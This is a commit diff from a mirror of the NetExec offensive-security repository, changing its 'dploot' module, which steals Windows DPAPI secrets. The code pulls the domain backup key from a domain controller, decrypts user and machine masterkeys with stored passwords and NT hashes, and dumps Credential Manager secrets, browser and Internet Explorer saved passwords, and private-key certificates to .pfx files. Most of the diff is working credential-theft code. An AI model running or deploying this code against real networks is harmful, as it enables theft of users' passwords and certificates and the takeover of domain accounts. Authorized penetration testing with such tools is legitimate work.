swisskyrepo
/
NetExec
mirror of https://github.com/swisskyrepo/NetExec.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add comments and limit cert dump to clientauth cert

main
zblurx 2023-01-23 10:12:28 +01:00
parent a25dad9705
commit 66cd0799ab
1 changed files with 28 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
cme/modules/dploot.py
View File

@ -19,23 +19,23 @@ class CMEModule:
def options(self, context, module_options): def options(self, context, module_options):
""" """
PVK Domain backup key file PVK Domain Backupkey file
MKFILE File with masterkeys in form of {GUID}:SHA1 MKFILE File with masterkeys in form of {GUID}:SHA1
DC_IP IP Address of the domain controller, will use to request domain backup key DC_IP IP Address of the domain controller, will use to request Domain Backupkey
""" """
self.pvkbytes = None self.pvkbytes = None
self.dc_ip = None self.dc_ip = None
self.masterkeys = None self.masterkeys = None
if "PVK" in module_options: if "PVK" in module_options: # Used to give Domain Backup Key to the module in order to dump user related dpapi secrets
self.pvkbytes = open(module_options["PVK"], 'rb').read() self.pvkbytes = open(module_options["PVK"], 'rb').read()
if "MKFILE" in module_options: if "MKFILE" in module_options: # File with decrypted masterkeys
self.masterkeys = parse_masterkey_file(module_options["MKFILE"]) self.masterkeys = parse_masterkey_file(module_options["MKFILE"])
self.pvkbytes = open(module_options["MKFILE"], 'rb').read() self.pvkbytes = open(module_options["MKFILE"], 'rb').read()
self.use_dc = False self.use_dc = False
if "DC_IP" in module_options: if "DC_IP" in module_options: # If filled, will connect to it in order to request Domain Backupkey
self.dc_ip = module_options["DC_IP"] self.dc_ip = module_options["DC_IP"]
self.use_dc = True self.use_dc = True
pass pass
@ -51,7 +51,7 @@ class CMEModule:
lmhash = getattr(connection, "lmhash", "") lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "") nthash = getattr(connection, "nthash", "")
if self.use_dc : if self.use_dc : # If the DC ip is filled, will connect to it with used account and dump Domain Backupkey
dc = Target.create( dc = Target.create(
domain=domain, domain=domain,
username=username, username=username,
@ -66,9 +66,9 @@ class CMEModule:
) )
dc_conn = DPLootSMBConnection(dc) dc_conn = DPLootSMBConnection(dc)
dc_conn.connect() dc_conn.connect() # Connect to DC
if dc_conn.is_admin: if dc_conn.is_admin: # If is DA, dump Domain Backupkey
context.log.info("Downloading Domain Backupkey") context.log.info("Downloading Domain Backupkey")
backupkey_triage = BackupkeyTriage(target=dc, conn=dc_conn) backupkey_triage = BackupkeyTriage(target=dc, conn=dc_conn)
backupkey = backupkey_triage.triage_backupkey() backupkey = backupkey_triage.triage_backupkey()
@ -88,13 +88,15 @@ class CMEModule:
) )
conn = DPLootSMBConnection(target) conn = DPLootSMBConnection(target)
conn.connect() conn.connect() # Upgrade SMB connection to the target to DPLoot specific SMB connection
# Get cleartext passwords and nthashes from CMEDB in order to use them to decrypt masterkeys
plaintexts = {username:password for _, _, username, password, _,_ in context.db.get_credentials(credtype="plaintext")} plaintexts = {username:password for _, _, username, password, _,_ in context.db.get_credentials(credtype="plaintext")}
nthashes = {username:nt.split(':')[1] if ':' in nt else nt for _, _, username, nt, _,_ in context.db.get_credentials(credtype="hash")} nthashes = {username:nt.split(':')[1] if ':' in nt else nt for _, _, username, nt, _,_ in context.db.get_credentials(credtype="hash")}
context.log.info("Gathering masterkeys") context.log.info("Gathering masterkeys")
# Collect User and Machine masterkeys
masterkeys_triage = MasterkeysTriage(target=target, conn=conn, pvkbytes=self.pvkbytes, passwords=plaintexts, nthashes=nthashes) masterkeys_triage = MasterkeysTriage(target=target, conn=conn, pvkbytes=self.pvkbytes, passwords=plaintexts, nthashes=nthashes)
if self.masterkeys is None: if self.masterkeys is None:
self.masterkeys = masterkeys_triage.triage_masterkeys() self.masterkeys = masterkeys_triage.triage_masterkeys()
@ -102,6 +104,7 @@ class CMEModule:
context.log.info("Looting secrets") context.log.info("Looting secrets")
# Collect User and Machine Credentials Manager secrets
credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=self.masterkeys) credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=self.masterkeys)
credentials = credentials_triage.triage_credentials() credentials = credentials_triage.triage_credentials()
for credential in credentials: for credential in credentials:
@ -110,28 +113,31 @@ class CMEModule:
for credential in system_credentials: for credential in system_credentials:
context.log.highlight("[CREDENTIAL] %s - %s:%s" % (credential.target, credential.username, credential.password)) context.log.highlight("[CREDENTIAL] %s - %s:%s" % (credential.target, credential.username, credential.password))
# Collect Chrome Based Browser stored secrets
browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=self.masterkeys) browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=self.masterkeys)
browser_credentials, _ = browser_triage.triage_browsers() browser_credentials, _ = browser_triage.triage_browsers()
for credential in browser_credentials: for credential in browser_credentials:
context.log.highlight("[%s] %s - %s:%s" % (credential.browser.upper(), credential.url, credential.username, credential.password)) context.log.highlight("[%s] %s - %s:%s" % (credential.browser.upper(), credential.url, credential.username, credential.password))
# Collect User Internet Explorer stored secrets
vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=self.masterkeys) vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=self.masterkeys)
vaults = vaults_triage.triage_vaults() vaults = vaults_triage.triage_vaults()
for vault in vaults: for vault in vaults:
if vault.type == 'Internet Explorer': if vault.type == 'Internet Explorer':
context.log.highlight("[Internet Explorer] %s - %s:%s" % (vault.resource, vault.username, vault.password)) context.log.highlight("[Internet Explorer] %s - %s:%s" % (vault.resource, vault.username, vault.password))
# Collect User and Machine certificates with private keys
certificates_triage = CertificatesTriage(target=target,conn=conn, masterkeys=self.masterkeys) certificates_triage = CertificatesTriage(target=target,conn=conn, masterkeys=self.masterkeys)
certificates = certificates_triage.triage_certificates() certificates = certificates_triage.triage_certificates()
for certificate in certificates: for certificate in certificates:
if certificate.clientauth:
filename = "%s_%s.pfx" % (certificate.username,certificate.filename[:16]) filename = "%s_%s.pfx" % (certificate.username,certificate.filename[:16])
context.log.success("Writting certificate to %s" % filename) context.log.success("Writting certificate to %s" % filename)
with open(filename, "wb") as f: with open(filename, "wb") as f:
f.write(certificate.pfx) f.write(certificate.pfx)
system_certificates = certificates_triage.triage_system_certificates() system_certificates = certificates_triage.triage_system_certificates()
for certificate in system_certificates: for certificate in system_certificates:
if certificate.clientauth:
filename = "%s_%s.pfx" % (certificate.username,certificate.filename[:16]) filename = "%s_%s.pfx" % (certificate.username,certificate.filename[:16])
context.log.success("Writting certificate to %s" % filename) context.log.success("Writting certificate to %s" % filename)
with open(filename, "wb") as f: with open(filename, "wb") as f: